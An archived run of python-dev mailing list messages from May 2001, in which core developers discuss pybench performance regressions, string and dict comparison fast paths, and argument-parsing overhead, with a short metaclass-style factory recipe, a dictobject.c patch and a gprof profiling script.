Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby -- that is to say, the class Spam is not an instance of SpamMetaClass -- nonetheless, SpamMetaClass still acts as a "higher level" class that provides methods on behalf of the class Spam where said methods are 1) independent of any particular instance of Spam and 2) allow for factory-method-style creation of Spam instances -- these being two very important attributes of the metaclass concept. Plus "meta" is a nice, short name. :-) Plus using "MetaClass" to refer to the class and "Meta" to refer to the singleton instance of "MetaClass" is reasonably clear and succinct, I think. One nice thing about the proposed recipe is that the SpamMeta object is a real class instance of a real class. This means that -- unlike when using the "module function" recipe -- we get inheritance of methods, and -- unlike when using the "callable wrapper class" recipe -- we also get override of methods. The example below illustrates both of these important capabilities. 
class Class1MetaClass: # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self): # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3): # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1: # Base class

        def whoami(self):
            print 'Class1.whoami:', self

Class1Meta = Class1MetaClass() # Make & name the singleton metaclass instance
Class1 = Class1Meta.Class1 # Make the Class1 name accessible

class Class2MetaClass(Class1MetaClass): # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self): # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1): # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass() # Make & name the singleton metaclass instance
Class2 = Class2Meta.Class2 # Make the Class2 name accessible

# Test

Class1Meta.whoami() # invoke "class method" of base class
Class2Meta.whoami() # invoke "class method" of derived class
Class1().whoami() # make an instance & invoke "instance method"
Class2().whoami()
print Class1Meta.newList() # factory method
print Class2Meta.newList() # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami:
Class2MetaClass.whoami:
Class1.whoami:
Class2.whoami:
[, , ]
[, , ]

Jim From tim.one at home.com Fri May 18 21:26:02 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:26:02 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B0509BF.A2F84A30@lemburg.com> Message-ID: [MAL] > It [pybench] doesn't claim "typical use".
pybench is aimed at finding > out performance issues about hot-spots -- there's no such thing as > a "typical program", so pybench gives you low level performance > compares for very specific tasks, e.g. dictionary creation or > for-loop performance. > > I have found it to be rather successful at that. At least gives > some good hints at where to look... There must be a misunderstanding here. I understand and appreciate all that! From tim.one at home.com Fri May 18 21:48:33 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:48:33 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518111559.A22344@glacier.fnational.com> Message-ID: [Neil Schemenauer] > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (i.e. > it's O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. I thought about that before. The inlining appeals but the algorithm not much: the dict implementation *as is* loops over all the table entries too, except that instead of starting with "i = 0" it starts (now) with "i = hash & mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^= poly"; and instead of giving up when "i >= length" it punts when finding an entry with a null value. Incrementing via ++i is certainly cheaper, except that even when small, the hash table usually hits on the first try when the key is present, so usually gets out before incrementing. > It's not clear to me though if it would be a win. Best guess is not. > Assuming that interned strings are the most common key, an association > table with four entries would take on average two pointer compares > to look up a value. Actually an average of 2.5 when the key is present and each key is equally likely to be queried, and always 4 when the queried key is not present.
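To make the arithmetic concrete, here is a minimal Python sketch (a model, not CPython's C code) of the two strategies being compared. `assoc_lookup` is a hypothetical linear association table that counts key comparisons, using `is` to stand in for the pointer compare that suffices for interned strings; `probe_cycle` applies only the `i <<= 1; if (i > mask) i ^= poly` step quoted above. The poly values 11 (x^3 + x + 1) and 19 (x^4 + x + 1) are assumptions chosen because they are primitive polynomials, not necessarily the constants dictobject.c uses.

```python
def assoc_lookup(table, key):
    """Linear scan over (key, value) pairs.

    Returns (found, value, compares).  Identity (`is`) stands in for the
    pointer compare that suffices when keys are interned strings.
    """
    compares = 0
    for k, v in table:
        compares += 1
        if k is key:
            return True, v, compares
    return False, None, compares


def probe_cycle(mask, poly):
    """Values visited by the step: i <<= 1; if i > mask: i ^= poly.

    poly must include mask + 1 (its top bit) and be odd; then the step is
    invertible, so starting from 1 the sequence cycles back to 1.  With a
    primitive poly it visits every nonzero slot exactly once.
    """
    i = 1
    visited = []
    while True:
        visited.append(i)
        i <<= 1
        if i > mask:
            i ^= poly
        if i == 1:
            return visited


keys = ["spam", "eggs", "ham", "toast"]
table = [(k, n) for n, k in enumerate(keys)]
hit_costs = [assoc_lookup(table, k)[2] for k in keys]
print(sum(hit_costs) / len(hit_costs))   # 2.5 compares on an average hit
print(assoc_lookup(table, "bacon")[2])   # 4 compares on a miss
print(probe_cycle(7, 8 + 3))             # [1, 2, 4, 3, 6, 7, 5]
```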
The hash table has better expected stats on both counts, but needs 4 unused slots too to achieve that. The savings would be in memory for small dicts more than in time (if at all). From jeremy at alum.mit.edu Fri May 18 23:07:37 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Fri, 18 May 2001 17:07:37 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns Message-ID: <200105182107.RAA16214@cliff.concentric.net> I did some profiles of more of the pybench slowdowns this afternoon and found a few causes for several problem benchmarks. I just made a couple of small changes for BuiltinFunctionCalls. The problem here is that PyCFunction calls were optimized for flags == 0 and not flags == METH_VARARGS, which is more common. The scary thing about BuiltinFunctionCalls is that the profiler shows it spending almost 30% of its time in PyArg_ParseTuple(). It certainly is a shame that we have this complicated, slow run-time parsing mechanism to deal with a static property of the code, namely how many arguments it takes and what their types are. A few of the other tests, SimpleComplexArithmetic and CreateStringsWithConcat, are slower because of the new coercion logic. I didn't spend much time on SimpleComplexArithmetic, but I did look at CreateStringsWithConcat in some detail. The basic problem is that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls PyNumber_Add("ab", "cd"). This function tries all sorts of different ways to coerce the strings into addable numbers before giving up and trying sequence concat. It looks like the new coercion rules have optimized number ops at the expense of string ops. If you're writing programs with lots of numbers, you probably think that's peachy. If you're parsing HTML, perhaps you don't :-). I looked at the test suite to see how often it is called with non-number arguments. The answer is 77% of the time, but almost all of those calls are from test_unicodedata.
If that one test is excluded, the majority of the calls (~90%) are with numbers. But the majority of those calls just come from a few tests -- test_pow, test_long, test_mutants, test_strftime. If I were to do something about the coercions, I would see if there was a way to quickly determine that PyNumber_Add() ain't gonna have any luck. Then we could bail to things like string_concat more quickly. I also looked at SmallLists. It seems that the only significant change since 1.5.2 is the garbage collection. This test spends a lot more time deallocating lists than it used to, and the only change I see in the code is the GC. I assume, but haven't checked, that the story is similar for SmallTuples. So the primary things that have slowed down since 1.5.2 seem to be: comparisons, coercion, and memory management for containers. These also seem to be the things that have improved the most in terms of features, completeness, etc. Looks like we need to revisit them and sort out the performance issues. Jeremy From guido at digicool.com Fri May 18 23:58:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 17:58:25 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT." <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> > The scary thing about BuiltinFunctionCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and what their types are.
I would love to see a mechanism whereby the signature of a C function could be stored as part of the static info about it, in an extension of the PyMethodDef structure: this would serve as documentation, allow for introspection, etc. I'm sure Ping would love this for pydoc and his inspect module. But I'm not sure how much we can speed things up, unless we give up on the tuple interface (an argc/argv API could be much faster since usually the arguments are already on the frame's stack in this form). > A few of the other tests, SimpleComplexArithmetic and > CreateStringsWithConcat, are slower because of the new coercion > logic. I didn't spend much time on SimpleComplexArithmetic, but I did > look at CreateStringsWithConcat in some detail. The basic problem is > that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls > PyNumber_Add("ab", "cd"). This function tries all sorts of different > ways to coerce the strings into addable numbers before giving up and > trying sequence concat. > > It looks like the new coercion rules have optimized number ops at the > expense of string ops. If you're writing programs with lots of > numbers, you probably think that's peachy. If you're parsing HTML, > perhaps you don't :-). > > I looked at the test suite to see how often it is called with > non-number arguments. The answer is 77% of the time, but almost all > of those calls are from test_unicodedata. If that one test is > excluded, the majority of the calls (~90%) are with numbers. But the > majority of those calls just come from a few tests -- test_pow, > test_long, test_mutants, test_strftime. > > If I were to do something about the coercions, I would see if there > was a way to quickly determine that PyNumber_Add() ain't gonna have > any luck. Then we could bail to things like string_concat more > quickly. There's already a special case for int+int in the BINARY_ADD opcode (otherwise you would probably see more numbers). 
Maybe another special case for str+str would help here? > I also looked at SmallLists. It seems that the only significant > change since 1.5.2 is the garbage collection. This test spends a lot > more time deallocating lists than it used to, and the only change I > see in the code is the GC. I assume, but haven't checked, that the > story is similar for SmallTuples. > > So the primary things that have slowed down since 1.5.2 seem to be: > comparisons, coercion, and memory management for containers. These > also seem to be the things that have improved the most in terms of > features, completeness, etc. Looks like we need to revisit them and > sort out the performance issues. Thanks for doing all this work, Jeremy! I just hope that these performance hacks won't have to be redone when I'm done with healing the types/class split. I'm expecting that things can become a lot simpler if everything inherits from Object, sequences inherit from Sequence, and so on. But since I'm currently going slow on this work, I won't complain too much if the existing code gets optimized first. The stuff you already checked in looks good! --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Sat May 19 00:06:05 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Fri, 18 May 2001 18:06:05 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> References: <200105182107.RAA16214@cliff.concentric.net> <200105182158.QAA01250@cj20424-a.reston1.va.home.com> Message-ID: <15109.40141.757071.770265@slothrop.digicool.com> In case anyone else is interested, here are two quick pointers on running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only):

LDFLAGS="-pg" OPT="-pg" configure
make

When you run python it produces a gmon.out file. To run gprof, pass it the profile-enabled executable and gmon.out. It'll spit out the results on stdout.

2.
Use this handy script (below) to run a single pybench test under the profiler and produce the output. Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile('^([^:]+):(.*)')
rx_decl = re.compile('class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name
    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)
    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)
    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])

From jim at interet.com Sat May 19 18:45:15 2001 From: jim at interet.com (James C. Ahlstrom) Date: Sat, 19 May 2001 12:45:15 -0400 Subject: [Python-Dev] [off topic] Python is taking over the world Message-ID: <3B06A31B.67A8D010@interet.com> I was in my local (Somerville, NJ) Borders book store last week and noticed that they stocked many Python books, most in multiple copies. It all added up to three feet of Python books. Great.
The clincher was when I went to my YMCA, and saw that someone had posted a flyer offering tutoring in Math, Physics, Java and Python. Congratulations to Guido and all on this list. JimA From guido at digicool.com Sun May 20 01:18:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 19 May 2001 19:18:25 -0400 Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com> For all you Douglas Adams fans out there: Douglas Noel Adams 1952 - 2001 http://www.douglasadams.com --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sun May 20 11:31:25 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:31:25 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > If I set tp_richcompare of strings to 0, I get past this code, and do > > c = (*f)(v, w); > if (PyErr_Occurred()) Note that the usual way to write this is if (c < 0 && PyErr_Occurred()) More work for my artificial "ab" < "cd" case but a net win in real life (when c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, when c < 0 there's no way in the cmp protocol to use c's value alone to distinguish between "less than" and "error"). > return NULL; > return convert_3way_to_object(op, c); > > Here, I get 3 function calls: f is string_compare, then > PyErr_Occurred, finally convert_3way_to_object, which converts > {-1,0,1} x Op -> {Py_True, Py_False}. Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. > Indeed, when I inline convert_3way_to_object, I get the same speed in > both cases (with the remaining differences attributed to measurement > and gcc doing register usage differently in both functions). OK, understood, and thanks for following up!
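Martin's description of convert_3way_to_object, which maps a three-way result in {-1, 0, 1} plus a rich-comparison op to true or false, can be modeled in Python as a table from op to a test against zero. This is an illustrative sketch, not the C function: `convert_3way`, `cmp3`, and the op-name strings are hypothetical stand-ins for the real code and the Py_LT ... Py_GE constants.

```python
import operator

# Each rich-comparison op becomes a test of the 3-way result c against 0;
# for example, Py_LE holds exactly when c <= 0.
_OP_TESTS = {
    "Py_LT": operator.lt,
    "Py_LE": operator.le,
    "Py_EQ": operator.eq,
    "Py_NE": operator.ne,
    "Py_GT": operator.gt,
    "Py_GE": operator.ge,
}


def convert_3way(op, c):
    """Return the boolean outcome of `op`, given a cmp-style result c."""
    return _OP_TESTS[op](c, 0)


def cmp3(a, b):
    """Python 3 stand-in for the old cmp(): returns -1, 0 or 1."""
    return (a > b) - (a < b)


print(convert_3way("Py_LT", cmp3("ab", "cd")))  # True
print(convert_3way("Py_EQ", cmp3("ab", "cd")))  # False
```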
> I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. In the absence of significant sorting, I agree Py_EQ is most frequent.
> With a control flow like
>
>   if (a->ob_size != b->ob_size)
>     goto False;
>
>   if (a->ob_size == 0)
>     goto True;
>
>   if (a->ob_sval[0] != b->ob_sval[0])
>     goto False;
>
>   if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>     goto False;
>   else
>     goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

    if (a->ob_size != b->ob_size ||
        a->ob_sval[0] != b->ob_sval[0])
            goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't include the trailing null byte Python always sticks at the end of string objects; and the first-byte check is much more likely to pay off than the zero-length check (comparison to a null string? gotta be rare as clear conclusions), and better to test for the more common case first. From tim.one at home.com Sun May 20 11:54:08 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:54:08 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> Message-ID: [Tim] >> 1. String objects are also equal despite being different objects, >> if their ob_sinterned pointers are equal and non-NULL. So if >> you're looking for every trick in & out of the book, that's >> another one. [Martin v. Loewis] > That does not help. In the entire test suite, there are 0 instances > where strings are compared which are not identical, but have equal > ob_sinterned pointers. Good to know. Had you tried this a few weeks ago, there would have been thousands (it so happened that one-character strings weren't being interned *effectively*, and there were lots of 1-character cases then where #1 applied; that's been fixed; good to know more aren't popping up). > ...
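The equality fast path Martin proposes, with Tim's suggestion of folding the first-byte test into the length test, can be modeled in Python on bytes objects. This is a sketch of the control flow only: `fast_bytes_eq` is a hypothetical name, `a == b` stands in for memcmp, and slicing `a[:1]` replaces the C code's reliance on the trailing null byte, since indexing an empty bytes object would raise IndexError. The separate zero-length test is dropped here because the full compare already handles empty strings.

```python
def fast_bytes_eq(a: bytes, b: bytes) -> bool:
    """Equality test ordered cheapest-and-most-decisive first."""
    # Tim's collapsed test: differing lengths or differing first bytes
    # settle most unequal pairs without touching the rest of the data.
    if len(a) != len(b) or a[:1] != b[:1]:
        return False
    # Same length and same first byte: fall back to a full compare
    # (memcmp in the C version).
    return a == b


print(fast_bytes_eq(b"spam", b"spam"))  # True
print(fast_bytes_eq(b"spam", b"scam"))  # False (needs the full compare)
```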
> Whether there's a fruitless branch depends on your compiler. A branch instruction is a branch instruction; I didn't distinguish between taken and non-taken branches, as there's no uniformity in codegen across platforms. > With gcc 3, you can write > > if (__builtin_expect(a == b, 0)) { > > and then the body of the if block will be moved out of the way of > linear control flow. I don't think we'll be littering Python with compiler-specific hacks. It's good to get the less common case out-of-line, but it's not a pure win: while it reduces the penalty when the test doesn't pay, it also reduces the benefit when it does pay (by the wildly architecture-dependent cost of taking a mispredicted out-of-line branch, and the wildly compiler-dependent costs of how seriously they take their own decisions or user hints to out-of-line a block (e.g., the compiler may refetch everything from memory again at the target if it thinks it's truly rare)). >> Any idea where those 800,000 virgin calls to oldcomp are coming >> from? That's a lot. > As far as I could trace it, most of them come from lookdict_string (at > various locations inside this function). Ah! Of course. string_compare is hardwired into lookdict_string. This case may be important enough to merit a distinct _PyString_Equal function, with just the stuff lookdict_string needs (e.g., there's never a gain in testing for pointer equality when called from lookdict_string because the dict code already checked that; but there may be a gain for that test in an all-purpose string_richcompare). > ... > So to support sorting better, I should special-case Py_LT in > string_richcompare also, to avoid the function call ?-) Of course. string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE anyway, and that's most of the work for resolving all 6 possibilities. Get rid of string_compare entirely! [on cmp sloth] > Yes, that is a serious problem. Fortunately, very few calls in my > programs go to string_compare through cmp() now.
But then, your > programs are different, of course... There are search-tree modules I have but didn't write that do this; I don't care enough about them to frustrate Guido's grand vision > It may be more important for sequences other than 8-bit strings, as each call to a comparison function for a pair of non-string sequences is very expensive (involving more layers of calls for each element comparison). From tim.one at home.com Sun May 20 12:13:14 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 06:13:14 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. If the time machine batteries can hold a full charge, you may want to go back and add Py_CMP as a seventh possible desired-operation argument to the rich comparison API. My experience with dict comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp (potentially) compute cmp 3 times to fake one cmp. But if dict richcmp knew a cmp outcome was desired, it could compute it with no extra work to speak of. Then there would be no reason at all to hold on to the dict tp_compare slot. The list and tuple richcmps are also doing almost all the work needed to compute a 3-way cmp outcome. From tim.one at home.com Sun May 20 13:05:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 07:05:53 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B037D27.E258C363@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > Running the same test for 2.1 vs. 2.0 there's not much to > notice, so the important changes seem to be originating in > the move from 1.5.2 to 2.0.
IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for 1.5.2, and Fredrik did more independently (like inlining high-frequency int operations in the eval loop). Also IIRC, that's the last time any concerted effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and unstable equilibrium never endures without deliberate and persistent rebalancing work. If Python were "a real product", it would be at least one person's full-time job to keep it in peak shape. But it's not even a part-time job for anyone, and I don't see that changing. In compensation, machines have gotten faster much quicker than Python has slowed. From mal at lemburg.com Sun May 20 13:50:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 13:50:17 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07AF79.6EB42E54@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > Running the same test for 2.1 vs. 2.0 there's not much to > > notice, so the important changes seem to be originating in > > the move from 1.5.2 to 2.0. > > IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for > 1.5.2, and Fredrik did more independently (like inlining high-frequency int > operations in the eval loop). Also IIRC, that's the last time any concerted > effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and > unstable equilibrium never endures without deliberate and persistent > rebalancing work. If Python were "a real product", it would be at least one > person's full-time job to keep it in peak shape. But it's not even a > part-time job for anyone, and I don't see that changing. In compensation, > machines have gotten faster much quicker than Python has slowed. How about making performance the main "feature" for 2.3 then ?! 
2.0 - 2.2 introduced many new features in the interpreter core, so I think it's time to stabilize those features and focus on making Python regain the performance it had before those features were introduced. At least to some of us, performance is an issue and I think that there's a lot we can do to improve it. One way to open up the field for better performance will be to modularize the interpreter, so that new ways of optimization can be explored, e.g. turning the VM into a register machine (Skip once started looking into this with his Rattlesnake patches) or creating specialized VMs which can then be used by optimizing compilers as targets. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Sun May 20 13:52:40 2001 From: mwh at python.net (Michael Hudson) Date: 20 May 2001 12:52:40 +0100 Subject: [Python-Dev] Comparison speed In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400" References: Message-ID: "Tim Peters" writes: > Ah! Of course. string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct > _PyString_Equal function, with just the stuff lookdict_string needs Or just inlining it all into lookdict_string, something like: Index: Objects/dictobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.90 diff -c -r2.90 dictobject.c *** Objects/dictobject.c 2001/05/19 07:04:38 2.90 --- Objects/dictobject.c 2001/05/20 11:51:28 *************** *** 279,286 **** register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; - cmpfunc compare = PyString_Type.tp_compare; /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS --- 279,287 ---- register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; + #define S(s) ((PyStringObject*)(s)) + /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS *************** *** 299,305 **** freeslot = ep; else { if (ep->me_hash == hash ! && compare(ep->me_key, key) == 0) { return ep; } freeslot = NULL; --- 300,308 ---- freeslot = ep; else { if (ep->me_hash == hash ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0) { return ep; } freeslot = NULL; *************** *** 318,324 **** if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && compare(ep->me_key, key) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; --- 321,329 ---- if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! 
S(key)->ob_sval,S(key)->ob_size) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; *************** *** 327,332 **** --- 332,339 ---- if (incr > mask) incr ^= mp->ma_poly; /* clears the highest bit */ } + + #undef S } /* (apologies for the use of the preprocessor...). I'll leave it to someone else to work out if this is a win or not... -- >> REVIEW OF THE YEAR, 2000 << It was shit. Give us another one. -- NTK Know, 2000-12-29, http://www.ntk.net/ From tim.one at home.com Sun May 20 14:57:11 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:57:11 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B07AF79.6EB42E54@lemburg.com> Message-ID: [MAL] > How about making performance the main "feature" for 2.3 then ?! Guido may be a dictator, but he doesn't have a magic wand -- "the main feature" is what people volunteer to do and then fight for and then actually do. > 2.0 - 2.2 introduced many new features in the interpreter core, > so I think it's time to stabilize those features and focus on > making Python regain the performance it had before those features > were introduced. At least to some of us, performance is an > issue and I think that there's a lot we can do to improve it. "Performance" is meaningless unless quantified and made concrete: what is it that runs too slowly? "Everything" is not a useful answer. Speeding up line-at-a-time input was an example of something that worked, via focus and measurement and pushing ahead despite opposition. I doubt any other approach will bear fruit over such a short timeframe, and especially not without resources to throw at it. > One way to open up the field for better performance will be > to modularize the interpreter, so that new ways of optimization > can be explored, e.g. 
turning the VM into a register machine > (Skip once started looking into this with his Rattlesnake > patches) or creating specialized VMs which can then be used > by optimizing compilers as targets. Restructure the core for the benefit of optimizing compilers that don't exist? That sounds like an interesting research project, but not much to do with making 2.3 faster. In the meantime, modularization is more likely to make the VM that does exist slower. could-be-it's-easy-answers-or-none-ly y'rs - tim From tim.one at home.com Sun May 20 14:58:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:58:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: [Michael Hudson] > ... > (apologies for the use of the preprocessor...). I'll leave it to > someone else to work out if this is a win or not... Umm, but that's the *hard* part. I think even Guido knows how to do a string compare inline. From tim.one at home.com Sun May 20 15:09:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 09:09:50 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> Message-ID: [Jeremy Hylton] > ... > The scary thing about BuiltinFunctionCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and what their types are. Special-casing the snot out of "O" looks like a winner:

  count format   %total cumulative%
------- -------- ------ -----------
1440897 'O'       47.45       47.45
 327694 'O!'      10.79       58.24
 285570 'O|i'      9.40       67.65
 262168 'O!|O'     8.63       76.28
 227405 'l'        7.49       83.77
 146537 's#'       4.83       88.60
  76779 'OO|O'     2.53       91.12
  65682 '|ss'      2.16       93.29
  48033 'OO'       1.58       94.87
  39879 'O|O&O&'   1.31       96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test suite, after stripping ";" and ":" decorations. fast-paths-on-the-overtired-brain-ly y'rs - tim From aahz at rahul.net Sun May 20 15:50:08 2001 From: aahz at rahul.net (Aahz Maruch) Date: Sun, 20 May 2001 06:50:08 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: from "Tim Peters" at May 20, 2001 06:13:14 AM Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net> Tim Peters wrote: > > If the time machine batteries can hold a full charge, you may want > to go back and add Py_CMP as a seventh possible desired-operation > argument to the rich comparison API. My experience with dict > comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE > any cheaper than by doing a full cmp, so I put the dict oldcmp back in > order to avoid having dict richcmp (potentially) compute cmp 3 times > to fake one cmp. But if dict richcmp knew a cmp outcome was desired, > it could compute it with no extra work to speak of. Then there would > be no reason at all to hold on to the dict tp_compare slot. > > The list and tuple richcmps are also doing almost all the work needed > to compute a 3-way cmp outcome. +1 from me; there's one spot in my new Decimal.py where I optimize an expensive pair of equality tests down to one by using cmp(), and it's likely that similar cases will pop up. When I convert to C code, I'll want to keep doing that. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine.
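Aahz's case, and the Py_CMP idea generally, comes down to asking one three-way question instead of two boolean ones. As a minimal Python 3 sketch, assume a hypothetical value type whose comparison is expensive. A binary search that stops as soon as it finds the target needs a three-way answer at every probe. With only boolean comparisons that costs up to two calls per probe (== then <), while a 3-way comparison costs exactly one. The names `search3` and `CountingCmp` are illustrative and do not come from any library.

```python
from typing import Callable, Sequence, TypeVar

T = TypeVar("T")


def search3(items: Sequence[T], target: T, cmp3: Callable[[T, T], int]) -> int:
    """Return an index of target in sorted items, or -1 if absent.

    cmp3(a, b) returns a negative number, 0, or a positive number, like
    Python 2's cmp(); it is called exactly once per probe.
    """
    lo, hi = 0, len(items)
    while lo < hi:
        mid = (lo + hi) // 2
        c = cmp3(items[mid], target)  # one call answers <, == and >
        if c == 0:
            return mid
        if c < 0:
            lo = mid + 1
        else:
            hi = mid
    return -1


class CountingCmp:
    """A 3-way comparison that counts how often it is invoked."""

    def __init__(self) -> None:
        self.calls = 0

    def __call__(self, a: int, b: int) -> int:
        self.calls += 1
        return (a > b) - (a < b)
```

For example, searching `list(range(0, 100, 2))` for 42 returns 21 after a handful of `cmp3` calls, one per probe.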
